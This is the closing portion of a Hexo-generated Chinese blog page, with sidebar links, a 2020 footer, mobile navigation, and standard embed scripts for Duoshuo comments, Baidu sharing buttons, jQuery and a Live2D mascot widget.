            <a href="http://reqianduan.com" target="_blank">热前端</a>
          </li>
        
          <li>
            <a href="http://yuancheng.work" target="_blank">远程.work</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->

<!-- 多说公共js代码 start -->
<script type="text/javascript">
var duoshuoQuery = {short_name:"reqianduan"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0]
     || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
  </script>
<!-- 多说公共js代码 end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
